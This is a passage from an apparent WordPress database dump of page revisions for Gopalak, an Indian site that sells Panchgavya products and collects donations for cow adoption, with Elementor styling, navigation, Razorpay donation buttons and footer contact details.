for society do not have a market and because of their inability to advertise/marketing, they are not able to reach people even people want these best products</p><p>We also want to establish a market for such people who are continuously doing work hard to save GAUMAATA, they produce Panchgavya products and do poison free farming. We are committed to create a platform for such people who are producing best quality products to make poison free society and also doing commendable work to save the nation’s culture and civilization. Our only aim is to re-organize the cow based economy which will be governed by the villages &amp; villagers, because as long as this system was in the country, the country was called gold’s sparrow and today, where we have reached in the lack of this system, it is not hidden from anyone. In short, We want to make a poison free, healthy, happy, prosperous, wealthy and powerful nation.</p>		\n			<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-widget-social-icons.elementor-grid-0 .elementor-widget-container,.elementor-widget-social-icons.elementor-grid-mobile-0 .elementor-widget-container,.elementor-widget-social-icons.elementor-grid-tablet-0 .elementor-widget-container{line-height:1;font-size:0}.elementor-widget-social-icons:not(.elementor-grid-0):not(.elementor-grid-tablet-0):not(.elementor-grid-mobile-0) .elementor-grid{display:inline-grid}.elementor-widget-social-icons .elementor-grid{grid-column-gap:var(--grid-column-gap,5px);grid-row-gap:var(--grid-row-gap,5px);grid-template-columns:var(--grid-template-columns);-webkit-box-pack:var(--justify-content,center);-ms-flex-pack:var(--justify-content,center);justify-content:var(--justify-content,center);justify-items:var(--justify-content,center)}.elementor-icon.elementor-social-icon{font-size:var(--icon-size,25px);line-height:var(--icon-size,25px);width:calc(var(--icon-size, 25px) + (2 * var(--icon-padding, .5em)));height:calc(var(--icon-size, 25px) + (2 * var(--icon-padding, .5em)))}.elementor-social-icon{--e-social-icon-icon-color:#fff;display:-webkit-inline-box;display:-ms-inline-flexbox;display:inline-flex;background-color:#818a91;-webkit-box-align:center;-ms-flex-align:center;align-items:center;-webkit-box-pack:center;-ms-flex-pack:center;justify-content:center;text-align:center;cursor:pointer}.elementor-social-icon i{color:var(--e-social-icon-icon-color)}.elementor-social-icon svg{fill:var(--e-social-icon-icon-color)}.elementor-social-icon:last-child{margin:0}.elementor-social-icon:hover{opacity:.9;color:#fff}.elementor-social-icon-android{background-color:#a4c639}.elementor-social-icon-apple{background-color:#999}.elementor-social-icon-behance{background-color:#1769ff}.elementor-social-icon-bitbucket{background-color:#205081}.elementor-social-icon-codepen{background-color:#000}.elementor-social-icon-delicious{background-color:#39f}.elementor-social-icon-deviantart{background-color:#05cc47}.elementor-social-icon-digg{background-color:#005be2}.elementor-social-icon-dribbble{background-color:#ea4c89}.elementor-social-icon-elementor{background-color:#d30c5c}.elementor-social-icon-envelope{background-color:#ea4335}.elementor-social-icon-facebook,.elementor-social-icon-facebook-f{background-color:#3b5998}.elementor-social-icon-flickr{background-color:#0063dc}.elementor-social-icon-foursquare{background-color:#2d5be3}.elementor-social-icon-free-code-camp,.elementor-social-icon-freecodecamp{background-color:#006400}.elementor-social-icon-github{background-color:#333}.elementor-social-icon-gitlab{background-color:#e24329}.elementor-social-icon-globe{background-color:#818a91}.elementor-social-icon-google-plus,.elementor-social-icon-google-plus-g{background-color:#dd4b39}.elementor-social-icon-houzz{background-color:#7ac142}.elementor-social-icon-instagram{background-color:#262626}.elementor-social-icon-jsfiddle{background-color:#487aa2}.elementor-social-icon-link{background-color:#818a91}.elementor-social-icon-linkedin,.elementor-social-icon-linkedin-in{background-color:#0077b5}.elementor-social-icon-medium{background-color:#00ab6b}.elementor-social-icon-meetup{background-color:#ec1c40}.elementor-social-icon-mixcloud{background-color:#273a4b}.elementor-social-icon-odnoklassniki{background-color:#f4731c}.elementor-social-icon-pinterest{background-color:#bd081c}.elementor-social-icon-product-hunt{background-color:#da552f}.elementor-social-icon-reddit{background-color:#ff4500}.elementor-social-icon-rss{background-color:#f26522}.elementor-social-icon-shopping-cart{background-color:#4caf50}.elementor-social-icon-skype{background-color:#00aff0}.elementor-social-icon-slideshare{background-color:#0077b5}.elementor-social-icon-snapchat{background-color:#fffc00}.elementor-social-icon-soundcloud{background-color:#f80}.elementor-social-icon-spotify{background-color:#2ebd59}.elementor-social-icon-stack-overflow{background-color:#fe7a15}.elementor-social-icon-steam{background-color:#00adee}.elementor-social-icon-stumbleupon{background-color:#eb4924}.elementor-social-icon-telegram{background-color:#2ca5e0}.elementor-social-icon-thumb-tack{background-color:#1aa1d8}.elementor-social-icon-tripadvisor{background-color:#589442}.elementor-social-icon-tumblr{background-color:#35465c}.elementor-social-icon-twitch{background-color:#6441a5}.elementor-social-icon-twitter{background-color:#1da1f2}.elementor-social-icon-viber{background-color:#665cac}.elementor-social-icon-vimeo{background-color:#1ab7ea}.elementor-social-icon-vk{background-color:#45668e}.elementor-social-icon-weibo{background-color:#dd2430}.elementor-social-icon-weixin{background-color:#31a918}.elementor-social-icon-whatsapp{background-color:#25d366}.elementor-social-icon-wordpress{background-color:#21759b}.elementor-social-icon-xing{background-color:#026466}.elementor-social-icon-yelp{background-color:#af0606}.elementor-social-icon-youtube{background-color:#cd201f}.elementor-social-icon-500px{background-color:#0099e5}.elementor-shape-rounded .elementor-icon.elementor-social-icon{border-radius:10%}.elementor-shape-circle .elementor-icon.elementor-social-icon{border-radius:50%}</style>		\n					<a target=\"_blank\" rel=\"noopener\">\n						Facebook\n											</a>\n					<a target=\"_blank\" rel=\"noopener\">\n						Twitter\n											</a>\n					<a target=\"_blank\" rel=\"noopener\">\n						Youtube\n											</a>\n					<a target=\"_blank\" rel=\"noopener\">\n						Instagram\n											</a>\n															<img width=\"150\" height=\"150\" src=\"https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-150x150.png\" alt=\"\" loading=\"lazy\" srcset=\"https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-150x150.png 150w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-300x300.png 300w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-320x320.png 320w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-50x50.png 50w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-100x100.png 100w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-48x48.png 48w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-270x270.png 270w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-192x192.png 192w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-180x180.png 180w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-32x32.png 32w, https://gopalak.in/wp-content/uploads/2022/10/elementor/thumbs/cropped-GOPALAK-COIN-2.0-pwh7vrjfdc81vqqzgamifnehpvyy4kvm3g29jja5ym.png 75w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0.png 512w\" sizes=\"(max-width: 150px) 100vw, 150px\" />															\n			<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-heading-title{padding:0;margin:0;line-height:1}.elementor-widget-heading .elementor-heading-title[class*=elementor-size-]>a{color:inherit;font-size:inherit;line-height:inherit}.elementor-widget-heading .elementor-heading-title.elementor-size-small{font-size:15px}.elementor-widget-heading .elementor-heading-title.elementor-size-medium{font-size:19px}.elementor-widget-heading .elementor-heading-title.elementor-size-large{font-size:29px}.elementor-widget-heading .elementor-heading-title.elementor-size-xl{font-size:39px}.elementor-widget-heading .elementor-heading-title.elementor-size-xxl{font-size:59px}</style><h2>Help</h2>		\n			<h2><a href=\"https://gopalak.in/pricing-policy/\">Pricing Policy</a></h2>		\n			<h2><a href=\"https://gopalak.in/terms-and-conditions/\">Terms & Condition</a></h2>		\n			<h2><a href=\"https://gopalak.in/privacy-policy-2/\">Privacy Policy</a></h2>		\n			<h2><a href=\"https://gopalak.in/refunds-cancellation/\">Refunds/Cancellation</a></h2>		\n			<h2><a href=\"https://gopalak.in/vendor-register/\">Vendor Registartion</a></h2>		\n			<h2>Address</h2>		\n			 #800 Spandana towers\n<br>19th main roadr,  HSR Layout<br>2nd sector, near golden fresh super market<br>Bangalore, 560102<br>\nContact : (+91)7411722844<br>\nE-mail id: namaste@gopalak.in\n		<p>© 2022 <a href=\"https://gopalak.in/\">Gopalak</a> Designed by Homedirect</p>','AboutUs','','inherit','closed','closed','','1804-revision-v1','','','2022-10-20 18:10:09','2022-10-20 12:40:09','',1804,'https://gopalak.in/?p=1978',0,'revision','',0),(1979,1,'2022-10-20 18:16:45','2022-10-20 12:46:45','[[\"Organisation\",\"Purpose\",\"Amount\",\"Donate\"],[\"Gopalak donation2\",\"You can donate any amount of your choice which will be used for fodder to feed cows.\",\"Min:500\\nMax:1000\",\"<form><script src=\\\"https://checkout.razorpay.com/v1/payment-button.js\\\" data-payment_button_id=\\\"pl_KW1visGnvZh1xR\\\" async> </script> </form>\"],[\"Gopalak donation3\",\"You can donate any amount of your choice which will be used for fodder to feed cows.\",\"Min:500\\nMax:1000\\n\",\"<form><script src=\\\"https://checkout.razorpay.com/v1/payment-button.js\\\" data-payment_button_id=\\\"pl_KW1visGnvZh1xR\\\" async> </script> </form>\"],[\"Gopalak donation4\",\"You can donate any amount of your choice which will be used for fodder to feed cows.\",\"Min:500\\nMax:1000\",\"<form><script src=\\\"https://checkout.razorpay.com/v1/payment-button.js\\\" data-payment_button_id=\\\"pl_KW1visGnvZh1xR\\\" async> </script> </form>\"],[\"Gopalak donation5\",\"You can donate any amount of your choice which will be used for fodder to feed cows.\",\"Min:500\\nMax:1000\",\"<form><script src=\\\"https://checkout.razorpay.com/v1/payment-button.js\\\" data-payment_button_id=\\\"pl_KW1visGnvZh1xR\\\" async> </script> </form>\"]]','Donation','','inherit','closed','closed','','1851-revision-v1','','','2022-10-20 18:16:45','2022-10-20 12:46:45','',1851,'https://gopalak.in/?p=1979',0,'revision','',0),(1980,1,'2022-10-20 18:21:44','2022-10-20 12:51:44','[[\"Organisation\",\"Purpose\",\"Amount\",\"Donate\"],[\"Gopalak donation2\",\"You can donate any amount of your choice which will be used for fodder to feed cows.\",\"500\",\"<form><script src=\\\"https://checkout.razorpay.com/v1/payment-button.js\\\" data-payment_button_id=\\\"pl_KW1visGnvZh1xR\\\" async> </script> </form>\"],[\"Gopalak donation3\",\"You can donate any amount of your choice which will be used for fodder to feed cows.\",\"500\",\"<form><script src=\\\"https://checkout.razorpay.com/v1/payment-button.js\\\" data-payment_button_id=\\\"pl_KW1visGnvZh1xR\\\" async> </script> </form>\"],[\"Gopalak donation4\",\"You can donate any amount of your choice which will be used for fodder to feed cows.\",\"500\",\"<form><script src=\\\"https://checkout.razorpay.com/v1/payment-button.js\\\" data-payment_button_id=\\\"pl_KW1visGnvZh1xR\\\" async> </script> </form>\"],[\"Gopalak donation5\",\"You can donate any amount of your choice which will be used for fodder to feed cows.\",\"500\",\"<form><script src=\\\"https://checkout.razorpay.com/v1/payment-button.js\\\" data-payment_button_id=\\\"pl_KW1visGnvZh1xR\\\" async> </script> </form>\"]]','Donation','','inherit','closed','closed','','1851-revision-v1','','','2022-10-20 18:21:44','2022-10-20 12:51:44','',1851,'https://gopalak.in/?p=1980',0,'revision','',0),(1981,1,'2022-10-20 18:22:29','2022-10-20 12:52:29','<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-widget-image{text-align:center}.elementor-widget-image a{display:inline-block}.elementor-widget-image a img[src$=\".svg\"]{width:48px}.elementor-widget-image img{vertical-align:middle;display:inline-block}</style>												<img width=\"150\" height=\"150\" src=\"https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-150x150.png\" alt=\"\" loading=\"lazy\" srcset=\"https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-150x150.png 150w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-300x300.png 300w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-320x320.png 320w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-50x50.png 50w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-100x100.png 100w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-48x48.png 48w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-270x270.png 270w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-192x192.png 192w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-180x180.png 180w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-32x32.png 32w, https://gopalak.in/wp-content/uploads/2022/10/elementor/thumbs/cropped-GOPALAK-COIN-2.0-pwh7vrjfdc81vqqzgamifnehpvyy4kvm3g29jja5ym.png 75w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0.png 512w\" sizes=\"(max-width: 150px) 100vw, 150px\" />															\n			<a href=\"https://gopalak.in/\" role=\"button\">\n						Home\n					</a>\n			<a href=\"https://gopalak.in/shop/\" role=\"button\">\n						shop\n					</a>\n			<a href=\"https://gopalak.in/donate/\" role=\"button\">\n						Adopt/Donate\n					</a>\n			<a href=\"https://gopalak.in/aboutus/\" role=\"button\">\n						About us\n					</a>\n			<a href=\"https://gopalak.in/my-account/\" role=\"button\">\n						My Account\n					</a>\n															<img width=\"1263\" height=\"500\" src=\"https://gopalak.in/wp-content/uploads/2022/10/Contribute-123.png\" alt=\"\" loading=\"lazy\" srcset=\"https://gopalak.in/wp-content/uploads/2022/10/Contribute-123.png 1263w, https://gopalak.in/wp-content/uploads/2022/10/Contribute-123-300x119.png 300w, https://gopalak.in/wp-content/uploads/2022/10/Contribute-123-1024x405.png 1024w, https://gopalak.in/wp-content/uploads/2022/10/Contribute-123-768x304.png 768w, https://gopalak.in/wp-content/uploads/2022/10/Contribute-123-50x20.png 50w, https://gopalak.in/wp-content/uploads/2022/10/Contribute-123-48x19.png 48w\" sizes=\"(max-width: 1263px) 100vw, 1263px\" />															\n		<p>In India, cows wander on streets and there are hardly any people caring about them. They are left just as stray dogs where they roam on the roads, with some even bullied by the passers-by. Such cows are always hit by the people who seem it as fun to do so. Such cows need to be adopted or tamed by the locals in order to prevent them from the bullies or tortures they face. stress on these cows and requests people to join hands so that together we all can save our Gau Mata. It’s unfortunate to see that in India, where cows are worshipped as a Goddess, many people choose to ignore the conditions in which they are left to litter around and roam like just any other stray animal. Cows are valuable and it’s our duty to save this breed for it is only for our own benefit. We get milk by the cow which is, as we all know, necessary for our health. We need to preserve this rare species and for that it is necessary that people come forward to adopt them.</p>[table id=1 /]		\n			<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-widget-social-icons.elementor-grid-0 .elementor-widget-container,.elementor-widget-social-icons.elementor-grid-mobile-0 .elementor-widget-container,.elementor-widget-social-icons.elementor-grid-tablet-0 .elementor-widget-container{line-height:1;font-size:0}.elementor-widget-social-icons:not(.elementor-grid-0):not(.elementor-grid-tablet-0):not(.elementor-grid-mobile-0) .elementor-grid{display:inline-grid}.elementor-widget-social-icons .elementor-grid{grid-column-gap:var(--grid-column-gap,5px);grid-row-gap:var(--grid-row-gap,5px);grid-template-columns:var(--grid-template-columns);-webkit-box-pack:var(--justify-content,center);-ms-flex-pack:var(--justify-content,center);justify-content:var(--justify-content,center);justify-items:var(--justify-content,center)}.elementor-icon.elementor-social-icon{font-size:var(--icon-size,25px);line-height:var(--icon-size,25px);width:calc(var(--icon-size, 25px) + (2 * var(--icon-padding, .5em)));height:calc(var(--icon-size, 25px) + (2 * var(--icon-padding, .5em)))}.elementor-social-icon{--e-social-icon-icon-color:#fff;display:-webkit-inline-box;display:-ms-inline-flexbox;display:inline-flex;background-color:#818a91;-webkit-box-align:center;-ms-flex-align:center;align-items:center;-webkit-box-pack:center;-ms-flex-pack:center;justify-content:center;text-align:center;cursor:pointer}.elementor-social-icon i{color:var(--e-social-icon-icon-color)}.elementor-social-icon svg{fill:var(--e-social-icon-icon-color)}.elementor-social-icon:last-child{margin:0}.elementor-social-icon:hover{opacity:.9;color:#fff}.elementor-social-icon-android{background-color:#a4c639}.elementor-social-icon-apple{background-color:#999}.elementor-social-icon-behance{background-color:#1769ff}.elementor-social-icon-bitbucket{background-color:#205081}.elementor-social-icon-codepen{background-color:#000}.elementor-social-icon-delicious{background-color:#39f}.elementor-social-icon-deviantart{background-color:#05cc47}.elementor-social-icon-digg{background-color:#005be2}.elementor-social-icon-dribbble{background-color:#ea4c89}.elementor-social-icon-elementor{background-color:#d30c5c}.elementor-social-icon-envelope{background-color:#ea4335}.elementor-social-icon-facebook,.elementor-social-icon-facebook-f{background-color:#3b5998}.elementor-social-icon-flickr{background-color:#0063dc}.elementor-social-icon-foursquare{background-color:#2d5be3}.elementor-social-icon-free-code-camp,.elementor-social-icon-freecodecamp{background-color:#006400}.elementor-social-icon-github{background-color:#333}.elementor-social-icon-gitlab{background-color:#e24329}.elementor-social-icon-globe{background-color:#818a91}.elementor-social-icon-google-plus,.elementor-social-icon-google-plus-g{background-color:#dd4b39}.elementor-social-icon-houzz{background-color:#7ac142}.elementor-social-icon-instagram{background-color:#262626}.elementor-social-icon-jsfiddle{background-color:#487aa2}.elementor-social-icon-link{background-color:#818a91}.elementor-social-icon-linkedin,.elementor-social-icon-linkedin-in{background-color:#0077b5}.elementor-social-icon-medium{background-color:#00ab6b}.elementor-social-icon-meetup{background-color:#ec1c40}.elementor-social-icon-mixcloud{background-color:#273a4b}.elementor-social-icon-odnoklassniki{background-color:#f4731c}.elementor-social-icon-pinterest{background-color:#bd081c}.elementor-social-icon-product-hunt{background-color:#da552f}.elementor-social-icon-reddit{background-color:#ff4500}.elementor-social-icon-rss{background-color:#f26522}.elementor-social-icon-shopping-cart{background-color:#4caf50}.elementor-social-icon-skype{background-color:#00aff0}.elementor-social-icon-slideshare{background-color:#0077b5}.elementor-social-icon-snapchat{background-color:#fffc00}.elementor-social-icon-soundcloud{background-color:#f80}.elementor-social-icon-spotify{background-color:#2ebd59}.elementor-social-icon-stack-overflow{background-color:#fe7a15}.elementor-social-icon-steam{background-color:#00adee}.elementor-social-icon-stumbleupon{background-color:#eb4924}.elementor-social-icon-telegram{background-color:#2ca5e0}.elementor-social-icon-thumb-tack{background-color:#1aa1d8}.elementor-social-icon-tripadvisor{background-color:#589442}.elementor-social-icon-tumblr{background-color:#35465c}.elementor-social-icon-twitch{background-color:#6441a5}.elementor-social-icon-twitter{background-color:#1da1f2}.elementor-social-icon-viber{background-color:#665cac}.elementor-social-icon-vimeo{background-color:#1ab7ea}.elementor-social-icon-vk{background-color:#45668e}.elementor-social-icon-weibo{background-color:#dd2430}.elementor-social-icon-weixin{background-color:#31a918}.elementor-social-icon-whatsapp{background-color:#25d366}.elementor-social-icon-wordpress{background-color:#21759b}.elementor-social-icon-xing{background-color:#026466}.elementor-social-icon-yelp{background-color:#af0606}.elementor-social-icon-youtube{background-color:#cd201f}.elementor-social-icon-500px{background-color:#0099e5}.elementor-shape-rounded .elementor-icon.elementor-social-icon{border-radius:10%}.elementor-shape-circle .elementor-icon.elementor-social-icon{border-radius:50%}</style>		\n					<a target=\"_blank\" rel=\"noopener\">\n						Facebook\n											</a>\n					<a target=\"_blank\" rel=\"noopener\">\n						Twitter\n											</a>\n					<a target=\"_blank\" rel=\"noopener\">\n						Youtube\n											</a>\n					<a target=\"_blank\" rel=\"noopener\">\n						Instagram\n											</a>\n															<img width=\"150\" height=\"150\" src=\"https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-150x150.png\" alt=\"\" loading=\"lazy\" srcset=\"https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-150x150.png 150w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-300x300.png 300w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-320x320.png 320w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-50x50.png 50w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-100x100.png 100w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-48x48.png 48w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-270x270.png 270w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-192x192.png 192w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-180x180.png 180w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-32x32.png 32w, https://gopalak.in/wp-content/uploads/2022/10/elementor/thumbs/cropped-GOPALAK-COIN-2.0-pwh7vrjfdc81vqqzgamifnehpvyy4kvm3g29jja5ym.png 75w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0.png 512w\" sizes=\"(max-width: 150px) 100vw, 150px\" />															\n			<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-heading-title{padding:0;margin:0;line-height:1}.elementor-widget-heading .elementor-heading-title[class*=elementor-size-]>a{color:inherit;font-size:inherit;line-height:inherit}.elementor-widget-heading .elementor-heading-title.elementor-size-small{font-size:15px}.elementor-widget-heading .elementor-heading-title.elementor-size-medium{font-size:19px}.elementor-widget-heading .elementor-heading-title.elementor-size-large{font-size:29px}.elementor-widget-heading .elementor-heading-title.elementor-size-xl{font-size:39px}.elementor-widget-heading .elementor-heading-title.elementor-size-xxl{font-size:59px}</style><h2>Help</h2>		\n			<h2><a href=\"https://gopalak.in/pricing-policy/\">Pricing Policy</a></h2>		\n			<h2><a href=\"https://gopalak.in/terms-and-conditions/\">Terms & Condition</a></h2>		\n			<h2><a href=\"https://gopalak.in/privacy-policy-2/\">Privacy Policy</a></h2>		\n			<h2><a href=\"https://gopalak.in/refunds-cancellation/\">Refunds/Cancellation</a></h2>		\n			<h2><a href=\"https://gopalak.in/vendor-register/\">Vendor Registartion</a></h2>		\n			<h2>Address</h2>		\n			 #800 Spandana towers\n<br>19th main roadr,  HSR Layout<br>2nd sector, near golden fresh super market<br>Bangalore, 560102<br>\nContact : (+91)7411722844<br>\nE-mail id: namaste@gopalak.in\n		<p>© 2022 <a href=\"https://gopalak.in/\">Gopalak</a> Designed by Homedirect</p>','Donate','','inherit','closed','closed','','1816-revision-v1','','','2022-10-20 18:22:29','2022-10-20 12:52:29','',1816,'https://gopalak.in/?p=1981',0,'revision','',0),(1982,1,'2022-10-20 18:22:29','2022-10-20 12:52:29','<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-widget-image{text-align:center}.elementor-widget-image a{display:inline-block}.elementor-widget-image a img[src$=\".svg\"]{width:48px}.elementor-widget-image img{vertical-align:middle;display:inline-block}</style>												<img width=\"150\" height=\"150\" src=\"https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-150x150.png\" alt=\"\" loading=\"lazy\" srcset=\"https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-150x150.png 150w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-300x300.png 300w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-320x320.png 320w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-50x50.png 50w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-100x100.png 100w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-48x48.png 48w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-270x270.png 270w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-192x192.png 192w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-180x180.png 180w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-32x32.png 32w, https://gopalak.in/wp-content/uploads/2022/10/elementor/thumbs/cropped-GOPALAK-COIN-2.0-pwh7vrjfdc81vqqzgamifnehpvyy4kvm3g29jja5ym.png 75w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0.png 512w\" sizes=\"(max-width: 150px) 100vw, 150px\" />															\n			<a href=\"https://gopalak.in/\" role=\"button\">\n						Home\n					</a>\n			<a href=\"https://gopalak.in/shop/\" role=\"button\">\n						shop\n					</a>\n			<a href=\"https://gopalak.in/donate/\" role=\"button\">\n						Adopt/Donate\n					</a>\n			<a href=\"https://gopalak.in/aboutus/\" role=\"button\">\n						About us\n					</a>\n			<a href=\"https://gopalak.in/my-account/\" role=\"button\">\n						My Account\n					</a>\n															<img width=\"1263\" height=\"500\" src=\"https://gopalak.in/wp-content/uploads/2022/10/Contribute-123.png\" alt=\"\" loading=\"lazy\" srcset=\"https://gopalak.in/wp-content/uploads/2022/10/Contribute-123.png 1263w, https://gopalak.in/wp-content/uploads/2022/10/Contribute-123-300x119.png 300w, https://gopalak.in/wp-content/uploads/2022/10/Contribute-123-1024x405.png 1024w, https://gopalak.in/wp-content/uploads/2022/10/Contribute-123-768x304.png 768w, https://gopalak.in/wp-content/uploads/2022/10/Contribute-123-50x20.png 50w, https://gopalak.in/wp-content/uploads/2022/10/Contribute-123-48x19.png 48w\" sizes=\"(max-width: 1263px) 100vw, 1263px\" />															\n		<p>In India, cows wander on streets and there are hardly any people caring about them. They are left just as stray dogs where they roam on the roads, with some even bullied by the passers-by. Such cows are always hit by the people who seem it as fun to do so. Such cows need to be adopted or tamed by the locals in order to prevent them from the bullies or tortures they face. stress on these cows and requests people to join hands so that together we all can save our Gau Mata. It’s unfortunate to see that in India, where cows are worshipped as a Goddess, many people choose to ignore the conditions in which they are left to litter around and roam like just any other stray animal. Cows are valuable and it’s our duty to save this breed for it is only for our own benefit. We get milk by the cow which is, as we all know, necessary for our health. We need to preserve this rare species and for that it is necessary that people come forward to adopt them.</p>[table id=1 /]		\n			<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-widget-social-icons.elementor-grid-0 .elementor-widget-container,.elementor-widget-social-icons.elementor-grid-mobile-0 .elementor-widget-container,.elementor-widget-social-icons.elementor-grid-tablet-0 .elementor-widget-container{line-height:1;font-size:0}.elementor-widget-social-icons:not(.elementor-grid-0):not(.elementor-grid-tablet-0):not(.elementor-grid-mobile-0) .elementor-grid{display:inline-grid}.elementor-widget-social-icons .elementor-grid{grid-column-gap:var(--grid-column-gap,5px);grid-row-gap:var(--grid-row-gap,5px);grid-template-columns:var(--grid-template-columns);-webkit-box-pack:var(--justify-content,center);-ms-flex-pack:var(--justify-content,center);justify-content:var(--justify-content,center);justify-items:var(--justify-content,center)}.elementor-icon.elementor-social-icon{font-size:var(--icon-size,25px);line-height:var(--icon-size,25px);width:calc(var(--icon-size, 25px) + (2 * var(--icon-padding, .5em)));height:calc(var(--icon-size, 25px) + (2 * var(--icon-padding, .5em)))}.elementor-social-icon{--e-social-icon-icon-color:#fff;display:-webkit-inline-box;display:-ms-inline-flexbox;display:inline-flex;background-color:#818a91;-webkit-box-align:center;-ms-flex-align:center;align-items:center;-webkit-box-pack:center;-ms-flex-pack:center;justify-content:center;text-align:center;cursor:pointer}.elementor-social-icon i{color:var(--e-social-icon-icon-color)}.elementor-social-icon svg{fill:var(--e-social-icon-icon-color)}.elementor-social-icon:last-child{margin:0}.elementor-social-icon:hover{opacity:.9;color:#fff}.elementor-social-icon-android{background-color:#a4c639}.elementor-social-icon-apple{background-color:#999}.elementor-social-icon-behance{background-color:#1769ff}.elementor-social-icon-bitbucket{background-color:#205081}.elementor-social-icon-codepen{background-color:#000}.elementor-social-icon-delicious{background-color:#39f}.elementor-social-icon-deviantart{background-color:#05cc47}.elementor-social-icon-digg{background-color:#005be2}.elementor-social-icon-dribbble{background-color:#ea4c89}.elementor-social-icon-elementor{background-color:#d30c5c}.elementor-social-icon-envelope{background-color:#ea4335}.elementor-social-icon-facebook,.elementor-social-icon-facebook-f{background-color:#3b5998}.elementor-social-icon-flickr{background-color:#0063dc}.elementor-social-icon-foursquare{background-color:#2d5be3}.elementor-social-icon-free-code-camp,.elementor-social-icon-freecodecamp{background-color:#006400}.elementor-social-icon-github{background-color:#333}.elementor-social-icon-gitlab{background-color:#e24329}.elementor-social-icon-globe{background-color:#818a91}.elementor-social-icon-google-plus,.elementor-social-icon-google-plus-g{background-color:#dd4b39}.elementor-social-icon-houzz{background-color:#7ac142}.elementor-social-icon-instagram{background-color:#262626}.elementor-social-icon-jsfiddle{background-color:#487aa2}.elementor-social-icon-link{background-color:#818a91}.elementor-social-icon-linkedin,.elementor-social-icon-linkedin-in{background-color:#0077b5}.elementor-social-icon-medium{background-color:#00ab6b}.elementor-social-icon-meetup{background-color:#ec1c40}.elementor-social-icon-mixcloud{background-color:#273a4b}.elementor-social-icon-odnoklassniki{background-color:#f4731c}.elementor-social-icon-pinterest{background-color:#bd081c}.elementor-social-icon-product-hunt{background-color:#da552f}.elementor-social-icon-reddit{background-color:#ff4500}.elementor-social-icon-rss{background-color:#f26522}.elementor-social-icon-shopping-cart{background-color:#4caf50}.elementor-social-icon-skype{background-color:#00aff0}.elementor-social-icon-slideshare{background-color:#0077b5}.elementor-social-icon-snapchat{background-color:#fffc00}.elementor-social-icon-soundcloud{background-color:#f80}.elementor-social-icon-spotify{background-color:#2ebd59}.elementor-social-icon-stack-overflow{background-color:#fe7a15}.elementor-social-icon-steam{background-color:#00adee}.elementor-social-icon-stumbleupon{background-color:#eb4924}.elementor-social-icon-telegram{background-color:#2ca5e0}.elementor-social-i